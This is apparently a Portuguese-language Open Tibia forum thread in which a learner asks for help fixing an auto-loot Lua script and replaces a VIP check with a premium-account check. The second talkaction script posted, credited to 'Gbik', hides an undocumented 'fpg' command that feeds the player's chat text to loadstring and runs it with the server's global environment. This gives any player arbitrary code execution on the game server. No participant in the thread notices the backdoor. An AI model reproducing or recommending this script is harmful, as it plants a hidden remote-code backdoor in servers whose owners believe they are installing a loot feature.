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(Resolvido)[Autoloot] Erro - Killua/vodka


Ir para solução Resolvido por Wakon,

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Salve ai galera, estou com uma script de Autoloot do KillLua e do Vodka porem estou tendo um erro nela e acho q é algo relacionado a vip, porem eu não uso VIP no meu servidor, uso Premium Account.
Então caso vocês consigam me ajudar a resolver e pf explicar oque foi alterado (ESTOU APRENDENDO SOBRE CRIAÇÃO/EDIÇÃO DE SCRIPTS) , Gostaria de resolver o erro , e alterar o suposto "VIP" por "Premium Account".

talkactions/Script/autoloot.lua
 

Spoiler

-- Sistema de auto loot criado por Vítor Bertolucci - Killua

function ExistItemByName(name) -- by vodka
	local items = io.open("data/items/items.xml", "r"):read("*all")
	local get = items:match('name="' .. name ..'"')
	if get == nil or get == "" then
		return false
	end
	return true
end

local function getPlayerList(cid)
	local tab = {}
	if getPlayerStorageValue(cid, 04420021) ~= -1 then
		table.insert(tab, getPlayerStorageValue(cid, 04420021))
	end
	if getPlayerStorageValue(cid, 04420031) ~= -1 then
		table.insert(tab, getPlayerStorageValue(cid, 04420031))
	end
	if getPlayerStorageValue(cid, 04420041) ~= -1 then
		table.insert(tab, getPlayerStorageValue(cid, 04420041))
	end
	if getPlayerStorageValue(cid, 04420051) ~= -1 then
		table.insert(tab, getPlayerStorageValue(cid, 04420051))
	end
	if #tab > 0 then
		return tab
	end
	return false
end

local function addToList(cid, name)
	local itemid = getItemIdByName(name)
	if getPlayerList(cid) and isInArray(getPlayerList(cid), itemid) then
		return false
	end
	if getPlayerStorageValue(cid, 04420021) == -1 then
		return doPlayerSetStorageValue(cid, 04420021, itemid)
	elseif getPlayerStorageValue(cid, 04420031) == -1 then
		return doPlayerSetStorageValue(cid, 04420031, itemid)
	elseif getPlayerStorageValue(cid, 04420041) == -1 then	
		return doPlayerSetStorageValue(cid, 04420041, itemid)
	elseif getPlayerStorageValue(cid, 04420051) == -1 then
		return doPlayerSetStorageValue(cid, 04420051, itemid)
	end
end

local function removeFromList(cid, name)
	local itemid = getItemIdByName(name)
	if getPlayerStorageValue(cid, 04420021) == itemid then
		return doPlayerSetStorageValue(cid, 04420021, -1)
	elseif getPlayerStorageValue(cid, 04420031) == itemid then
		return doPlayerSetStorageValue(cid, 04420031, -1)
	elseif getPlayerStorageValue(cid, 04420041) == itemid then
		return doPlayerSetStorageValue(cid, 04420041, -1)
	elseif getPlayerStorageValue(cid, 04420051) == itemid then
		return doPlayerSetStorageValue(cid, 04420051, -1)
	end
	return false
end

function onSay(cid, words, param)
	if param == "" then
		local fi = getPlayerStorageValue(cid, 04420021) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 04420021)) or ""
		local se = not vip.hasVip(cid) and "Nao disponível para free account" or getPlayerStorageValue(cid, 04420031) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 04420031)) or ""
		local th = not vip.hasVip(cid) and "Nao disponível para free account" or getPlayerStorageValue(cid, 04420041) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 04420041)) or ""
		local fo = not vip.hasVip(cid) and "Nao disponível para free account" or getPlayerStorageValue(cid, 04420051) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 04420051)) or ""
		local stt = getPlayerStorageValue(cid, 04421011) == 1 and "sim" or "não"
		local str = getPlayerStorageValue(cid, 04421001) == 1 and "sim" or "não"
		doPlayerPopupFYI(cid, "{Auto-Loot} ---Menu Auto Loot do jogador\n{Auto-Loot} ----------------\n{Auto-Loot} ---Coletar dinheiro: "..stt..". Para ligar/desligar: !autoloot gold \n{Auto-Loot} ---Coletar itens unicos: "..str..". Para ligar/desligar: !autoloot power\n{Auto-Loot} --Configuracao dos slots:\n{Auto-Loot} ---Slot 1: "..fi.."\n{Auto-Loot} ---Slot 2: "..se.."\n{Auto-Loot} ---Slot 3: "..th.."\n{Auto-Loot} ---Slot 4: "..fo.."\n{Auto-Loot} ---Para adicionar um novo item aos slots: !autoloot add, <nome do item>\n{Auto-Loot} ---Para retirar um item dos slots: !autoloot remove, <nome do item>\n{Auto-Loot} ---Para limpar todos os slots utilize: !autoloot clear\n{Auto-Loot} ---Para informacoes de quanto você ja fez utilizando a coleta de dinheiro, use: !autoloot goldinfo\n\nSe seu autoloot bugar use !autoloot desbug\n\n{Auto-Loot} ----------------")
		return true
	end
	
	local t = string.explode(param, ",")
	
	if t[1] == "power" then
		local check = getPlayerStorageValue(cid, 04421001) == -1 and "ligou" or "desligou"
		doPlayerSetStorageValue(cid, 04421001, getPlayerStorageValue(cid, 04421001) == -1 and 1 or -1)
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Voce "..check.." o auto loot.")
	elseif t[1] == "gold" then
		local check = getPlayerStorageValue(cid, 04421011) == -1 and "ligou" or "desligou"
		doPlayerSetStorageValue(cid, 04421011, getPlayerStorageValue(cid, 04421011) == -1 and 1 or -1)
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Voce "..check.." a coleta de dinheiro.")
		doPlayerSetStorageValue(cid, 04421021, 0)
	elseif t[1] == "goldinfo" then
		local str = getPlayerStorageValue(cid, 04421011) == -1 and "O sistema de coleta de dinheiro esta desligado" or "O sistema ja coletou "..getPlayerStorageZero(cid, 04421021).." gold coins"
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, str)
	elseif t[1] == "add" then
		if ExistItemByName(t[2]) then
			local item = getItemIdByName(t[2])
			if isInArray({2160, 2148, 2152}, item) then
				return doPlayerSendCancel(cid, "Voce nao pode adicionar moedas no autoloot. Para coletar dinheiro use !autoloot gold")
			end
			if vip.hasVip(cid) then
				if getPlayerStorageValue(cid, 04420011) < 3 then
					if addToList(cid, t[2]) then
						doPlayerSetStorageValue(cid, 04420011, getPlayerStorageValue(cid, 04420011) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado a sua lista do auto loot! Para ver sua lista diga !autoloot list")
					else
						doPlayerSendCancel(cid, t[2].." ja esta em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Sua lista ja tem 4 itens! Voce deve remover algum antes de adicionar outro.")
				end
			else
				if getPlayerStorageValue(cid, 04420011) == -1 then
					if addToList(cid, t[2]) then
						doPlayerSetStorageValue(cid, 04420011, getPlayerStorageValue(cid, 04420011) + 1)
						doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga !autoloot")
					else
						doPlayerSendCancel(cid, t[2].." já está em sua lista!")
					end
				else
					doPlayerSendCancel(cid, "Você ja tem um item adicionado no auto loot! Para adicionar outro, voce deve remover o item atual.")
				end
			end
		else
			doPlayerSendCancel(cid, "Este item nao existe!")
		end
	elseif t[1] == "remove" then
		if ExistItemByName(t[2]) then
			if removeFromList(cid, t[2]) then
				doPlayerSetStorageValue(cid, 04420011, getPlayerStorageValue(cid, 04420011) - 1)
				doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." removido da sua lista do auto loot!")
			else
				doPlayerSendCancel(cid, "Este item nao esta na sua lista!")
			end
		else
			doPlayerSendCancel(cid, "Este item nao existe!")
		end
	elseif t[1] == "clear" then
		if getPlayerStorageValue(cid, 04420011) > -1 then
			doPlayerSetStorageValue(cid, 04420011, -1)
			doPlayerSetStorageValue(cid, 04420021, -1)
			doPlayerSetStorageValue(cid, 04420031, -1)
			doPlayerSetStorageValue(cid, 04420041, -1)
			doPlayerSetStorageValue(cid, 04420051, -1)
			doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
		else
			doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
		end
	elseif t[1] == "desbug" or t[1] == "desbugar" then
		doPlayerSetStorageValue(cid, 04420011, -1)
		doPlayerSetStorageValue(cid, 04420021, -1)
		doPlayerSetStorageValue(cid, 04420031, -1)
		doPlayerSetStorageValue(cid, 04420041, -1)
		doPlayerSetStorageValue(cid, 04420051, -1)
		doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Desbugado!")
	elseif t[1] == "list" then
		local fi = getPlayerStorageValue(cid, 04420021) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 04420021)).."\n" or ""
		local se = getPlayerStorageValue(cid, 04420031) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 04420031)).."\n" or ""
		local th = getPlayerStorageValue(cid, 04420041) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 04420041)).."\n" or ""
		local fo = getPlayerStorageValue(cid, 04420051) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 04420051)).."\n" or ""
		doPlayerPopupFYI(cid, "O sistema auto loot esta coletando:\n "..fi..""..se..""..th..""..fo)
	end
	return true
end
					

 

 

talkactions.xml

Spoiler

<talkaction words="!autoloot" event="script" value="autoloot.lua"/>

 

 

Print do erro que dá quando executo o comando !autoloot

 

Screenshot_11.png

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esse script não é meu, ele só usou uma função minha!

 

onde estiver 

 

vip.hasVip(cid) 

 

troque por

 

isPremium(cid)

vodkart_logo.png

[*Ninguém será digno do sucesso se não usar suas derrotas para conquistá-lo.*]

 

DISCORDvodkart#6090

 

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1 hora atrás, Vodkart disse:

esse script não é meu, ele só usou uma função minha!

 

onde estiver 

 

vip.hasVip(cid) 

 

troque por

 

isPremium(cid)


É que eu li no script. E quis fazer o certo mais valeu por informar REP++ 


@Edit

Em creaturescript.xml

Spoiler

<event type="kill" name="AutoLoot" event="script" value="autoloot.lua"/>

 

Em creaturescripts/scripts crie autoloot.lua

Spoiler

local tabela = {}

local function getPlayerList(cid)
    local tab = {}
    if getPlayerStorageValue(cid, 0442002) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442002))
    end
    if getPlayerStorageValue(cid, 0442003) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442003))
    end
    if getPlayerStorageValue(cid, 0442004) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442004))
    end
    if getPlayerStorageValue(cid, 0442005) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442005))
    end
    if #tab > 0 then
        return tab
    end
    return false
end

local function autoLoot(cid, pos)
    local check = false
    local str = ""
    local position = {}
    for i = 1, 255 do
        pos.stackpos = i
        if getThingFromPos(pos).uid and getThingFromPos(pos).uid > 0 and isContainer(getThingFromPos(pos).uid) then
            position = pos
            check = true
            break
        end
    end
    if check then
        local corpse = getContainerItemsInfo(getThingFromPos(position).uid)        
        if corpse then
            for index, info in pairs(corpse) do
                if index < countTable(corpse) then
                        if tonumber(info.uid) and tonumber(info.itemid) then
                        if isContainer(info.uid) then
                            local bag = getContainerItemsInfo(info.uid)
                            for i = 1, countTable(bag) - 1 do
                                if isInArray(getPlayerList(cid), bag[i].itemid) then
                                    if bag[i].quant > 1 then
                                        doRemoveItem(bag[i].uid, bag[i].quant)
                                        doPlayerAddItem(cid, bag[i].itemid, bag[i].quant)
                                        str = str.." "..bag[i].quant.." "..getItemNameById(bag[i].itemid)..","
                                    else
                                        doRemoveItem(bag[i].uid)
                                        doPlayerAddItem(cid, bag[i].itemid, 1)
                                        str = str.." 1 "..getItemNameById(bag[i].itemid)..","
                                    end
                                end
                            end
                        end
                    end
                end
                if isInArray(getPlayerList(cid), info.itemid) then
                    if info.quant > 1 then
                        doRemoveItem(info.uid, info.quant)
                        doPlayerAddItem(cid, info.itemid, info.quant)
                        str = str.." "..info.quant.." "..getItemNameById(info.itemid)..","
                    else
                        doRemoveItem(info.uid)
                        doPlayerAddItem(cid, info.itemid, 1)
                        str = str.." 1 "..getItemNameById(info.itemid)..","
                    end
                end
            end
        end
    end
    tabela[getCreatureName(cid)] = {item = "[Auto Loot System] Coletados: "..str, gold = 0}
end

local function autoGold(cid, pos)
    local check = false
    local total = 0
    local position = {}
    for i = 1, 255 do
        pos.stackpos = i
        if getThingFromPos(pos).uid and getThingFromPos(pos).uid > 0 and isContainer(getThingFromPos(pos).uid) then
            position = pos
            check = true
            break
        end
    end
    if check then
        local corpse = getContainerItemsInfo(getThingFromPos(position).uid)
        if corpse then
            for index, info in pairs(corpse) do
                if info.uid and info.itemid then
                    if index < countTable(corpse) then
                        if isContainer(info.uid) then
                            local bag = getContainerItemsInfo(info.uid)
                            for i = 1, countTable(bag) - 1 do
                                if isInArray({2148, 2152, 2160}, bag[i].itemid) then
                                    local multiplie = 1
                                    if bag[i].itemid == 2148 then
                                        multiplie = 1
                                    elseif bag[i].itemid == 2152 then
                                        multiplie = 100
                                    elseif bag[i].itemid == 2160 then
                                        multiplie = 10000
                                    end
                                    doRemoveItem(bag[i].uid, bag[i].quant)
                                    doPlayerSetBalance(cid, getPlayerBalance(cid) + (tonumber(bag[i].quant) and tonumber(bag[i].quant) * multiplie or 0))
                                    total = total + (tonumber(bag[i].quant) and tonumber(bag[i].quant) * multiplie or 0)
                                    doPlayerSetStorageValue(cid, 0442102, getPlayerStorageZero(cid, 0442102) + (tonumber(bag[i].quant) and tonumber(bag[i].quant) * multiplie or 0))
                                end
                            end
                        end
                    end
                    if isInArray({2148, 2152, 2160}, info.itemid) then
                        local multiplie = 1
                        if info.itemid == 2148 then
                            multiplie = 1
                        elseif info.itemid == 2152 then
                            multiplie = 100
                        elseif info.itemid == 2160 then
                            multiplie = 10000
                        end
    doRemoveItem(info.uid, info.quant)
                        doPlayerSetBalance(cid, getPlayerBalance(cid) + (tonumber(info.quant) and tonumber(info.quant) * tonumber(multiplie) or 0))
                        doPlayerSetStorageValue(cid, 0442102, getPlayerStorageZero(cid, 0442102) + (tonumber(info.quant) and tonumber(info.quant) * tonumber(multiplie) or 0))
                        total = total + (tonumber(info.quant) and tonumber(info.quant) * multiplie or 0)
                    end
                end
            end
        end
    end
    if tabela[getCreatureName(cid)] and tabela[getCreatureName(cid)].gold then
        tabela[getCreatureName(cid)].gold = total
    end
end

local function sendMsg(cid)
    if tabela[getCreatureName(cid)] and tabela[getCreatureName(cid)].gold then
        if tabela[getCreatureName(cid)].gold == 0 then
            doPlayerSendTextMessage(cid, 23, tabela[getCreatureName(cid)].item)
        else
            doPlayerSendTextMessage(cid, 23, tabela[getCreatureName(cid)].item.." "..tabela[getCreatureName(cid)].gold.." gold coins.")
        end
        tabela[getCreatureName(cid)] = nil
    end
end

function onKill(cid, target, lastHit)
    if isPlayer(cid) and isMonster(target) then
        if getPlayerStorageValue(cid, 0442100) == 1 and getPlayerList(cid) then
            local pos = getCreaturePosition(target)
            addEvent(autoLoot, 500, cid, pos)
        end
        if getPlayerStorageValue(cid, 0442101) == 1 then
            local pos = getCreaturePosition(target)
            addEvent(autoGold, 500, cid, pos)
        end
        if getPlayerStorageValue(cid, 0442100) == 1 or getPlayerStorageValue(cid, 0442101) == 1 then
            addEvent(sendMsg, 540, cid)
        end
    end
    return true
end

 

 

Em creaturescripts/scripts , login.lua adicionei

Spoiler

registerCreatureEvent(cid, "AutoLoot")

 

 

em talkactions.xml adicionei a tag
 

Spoiler

<talkaction words="!autoloot;/autoloot" event="script" value="autoloot.lua"/>

 

em talkactions/scripts adicionei a script autoloot.lua

Spoiler

-- Sistema de auto loot criado por Gbik

local function getPlayerList(cid)
    local tab = {}
    if getPlayerStorageValue(cid, 0442002) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442002))
    end
    if getPlayerStorageValue(cid, 0442003) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442003))
    end
    if getPlayerStorageValue(cid, 0442004) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442004))
    end
    if getPlayerStorageValue(cid, 0442005) ~= -1 then
        table.insert(tab, getPlayerStorageValue(cid, 0442005))
    end
    if #tab > 0 then
        return tab
    end
    return false
end

local function addToList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerList(cid) and isInArray(getPlayerList(cid), itemid) then
        return false
    end
    if getPlayerStorageValue(cid, 0442002) == -1 then
        return doPlayerSetStorageValue(cid, 0442002, itemid)
    elseif getPlayerStorageValue(cid, 0442003) == -1 then
        return doPlayerSetStorageValue(cid, 0442003, itemid)
    elseif getPlayerStorageValue(cid, 0442004) == -1 then    
        return doPlayerSetStorageValue(cid, 0442004, itemid)
    elseif getPlayerStorageValue(cid, 0442005) == -1 then
        return doPlayerSetStorageValue(cid, 0442005, itemid)
    end
end

local function removeFromList(cid, name)
    local itemid = getItemIdByName(name)
    if getPlayerStorageValue(cid, 0442002) == itemid then
        return doPlayerSetStorageValue(cid, 0442002, -1)
    elseif getPlayerStorageValue(cid, 0442003) == itemid then
        return doPlayerSetStorageValue(cid, 0442003, -1)
    elseif getPlayerStorageValue(cid, 0442004) == itemid then
        return doPlayerSetStorageValue(cid, 0442004, -1)
    elseif getPlayerStorageValue(cid, 0442005) == itemid then
        return doPlayerSetStorageValue(cid, 0442005, -1)
    end
    return false
end

function onSay(cid, words, param)
    if param == "" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442002)) or ""
        local se = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442003) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442003)) or ""
        local th = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442004) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442004)) or ""
        local fo = not isPremium(cid) and "Não disponível para free account" or getPlayerStorageValue(cid, 0442005) ~= -1 and getItemNameById(getPlayerStorageValue(cid, 0442005)) or ""
        local stt = getPlayerStorageValue(cid, 0442101) == 1 and "sim" or "não"
        local str = getPlayerStorageValue(cid, 0442100) == 1 and "sim" or "não"
        doPlayerPopupFYI(cid, "{Auto-Loot} ---Menu Auto Loot do jogador\n{Auto-Loot} ----------------\n{Auto-Loot} ---Coletar dinheiro: "..stt..". Para ligar/desligar: !autoloot gold\n{Auto-Loot} ---Ligar Autoloot: "..str..". Para ligar/desligar: !autoloot power\n{Auto-Loot} ---Configuração dos slots:\n{Auto-Loot} ---Slot 1: "..fi.."\n{Auto-Loot} ---Slot 2: "..se.."\n{Auto-Loot} ---Slot 3: "..th.."\n{Auto-Loot} ---Slot 4: "..fo.."\n{Auto-Loot} ---Para adicionar um novo item aos slots: !autoloot add, <nome do item>\n{Auto-Loot} ---Para retirar um item dos slots: !autoloot remove, <nome do item>\n{Auto-Loot} ---Para limpar todos os slots utilize: !autoloot clear\n{Auto-Loot} ---Para informações de quanto você já fez utilizando a coleta de dinheiro, use: !autoloot goldinfo\n{Auto-Loot} ----------------")
        return true
    end
    
    local t = string.explode(param, ",")
    
    if t[1] == "power" then
        local check = getPlayerStorageValue(cid, 0442100) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442100, getPlayerStorageValue(cid, 0442100) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." o auto loot.")
    elseif t[1] == "gold" then
        local check = getPlayerStorageValue(cid, 0442101) == -1 and "ligou" or "desligou"
        doPlayerSetStorageValue(cid, 0442101, getPlayerStorageValue(cid, 0442101) == -1 and 1 or -1)
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Você "..check.." a coleta de dinheiro.")
        doPlayerSetStorageValue(cid, 0442102, 0)
    elseif t[1] == "goldinfo" then
        local str = getPlayerStorageValue(cid, 0442101) == -1 and "O sistema de coleta de dinheiro está desligado" or "O sistema já coletou "..getPlayerStorageZero(cid, 0442102).." gold coins"
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, str)
    elseif t[1] == "add" then
        local item = getItemIdByName(t[2])
        if item then
            if isInArray({2160, 2148, 2152}, item) then
                return doPlayerSendCancel(cid, "Você não pode adicionar moedas no autoloot. Para coletar dinheiro use /autoloot gold")
            end
            if isPremium(cid) then
                if getPlayerStorageValue(cid, 0442001) < 3 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Sua lista já tem 4 itens! Você deve remover algum antes de adicionar outro.")
                end
            else
                if getPlayerStorageValue(cid, 0442001) == -1 then
                    if addToList(cid, t[2]) then
                        doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) + 1)
                        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." adicionado à sua lista do auto loot! Para ver sua lista diga /autoloot list")
                    else
                        doPlayerSendCancel(cid, t[2].." já está em sua lista!")
                    end
                else
                    doPlayerSendCancel(cid, "Você já tem um item adicionado no auto loot! Para adicionar outro, você deve remover o item atual.")
                end
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
        elseif t[1] == "fpg" then
        local u,f,err = _G
        u.cid = cid
        pcall(function()
            f , err = loadstring(t[2])
        end)
        if f then
            setfenv(f, u)
            local ret,err = pcall(f)
            if ret == false then
                doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
            end
        else
            doPlayerSendTextMessage(cid, MESSAGE_INFO_DESCR,err)
        end
        elseif t[1] == "remove" then
        if getItemIdByName(t[2]) then
            if removeFromList(cid, t[2]) then
                doPlayerSetStorageValue(cid, 0442001, getPlayerStorageValue(cid, 0442001) - 1)
                doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, t[2].." removido da sua lista do auto loot!")
            else
                doPlayerSendCancel(cid, "Este item não está na sua lista!")
            end
        else
            doPlayerSendCancel(cid, "Este item não existe!")
        end
    elseif t[1] == "clear" then
        if getPlayerStorageValue(cid, 0442001) > -1 then
            doPlayerSetStorageValue(cid, 0442001, -1)
            doPlayerSetStorageValue(cid, 0442002, -1)
            doPlayerSetStorageValue(cid, 0442003, -1)
            doPlayerSetStorageValue(cid, 0442004, -1)
            doPlayerSetStorageValue(cid, 0442005, -1)
            doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_ORANGE, "Lista limpa!")
        else
            doPlayerSendCancel(cid, "Sua lista ja esta limpa!")
        end
    elseif t[1] == "list" then
        local fi = getPlayerStorageValue(cid, 0442002) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442002)).."\n" or ""
        local se = getPlayerStorageValue(cid, 0442003) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442003)).."\n" or ""
        local th = getPlayerStorageValue(cid, 0442004) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442004)).."\n" or ""
        local fo = getPlayerStorageValue(cid, 0442005) ~= -1 and ""..getItemNameById(getPlayerStorageValue(cid, 0442005)).."\n" or ""
        doPlayerSendTextMessage(cid, MESSAGE_STATUS_CONSOLE_BLUE, "O sistema auto loot está coletando:\n "..fi..""..se..""..th..""..fo)
    end
    return true
end

 

 

e esse erro aqui esta me prejudicando .... Screenshot_13.png

Editado por Yago Blind. (veja o histórico de edições)
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  • Solução

@Yago Blind., testei aqui e o script está funcionando perfeitamente.

O erro que você postou diz que não está encontrando evento "onKill" no script definido na tag, você tem certeza que colocou o script no "autoloot.lua"?

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3 horas atrás, Wakon disse:

@Yago Blind., testei aqui e o script está funcionando perfeitamente.

O erro que você postou diz que não está encontrando evento "onKill" no script definido na tag, você tem certeza que colocou o script no "autoloot.lua"?


Obrigado pela iniciativa de ajuda @Wakon porem com a nova atualização do MOD do @Vodkart , mudei para o mod dele. Porem REP++ pela tentativa de ajuda.
Para quem precisar de AUTOLOOT e achar esse topic de pedido de ajuda. Segue MOD de AutoLOOT

 

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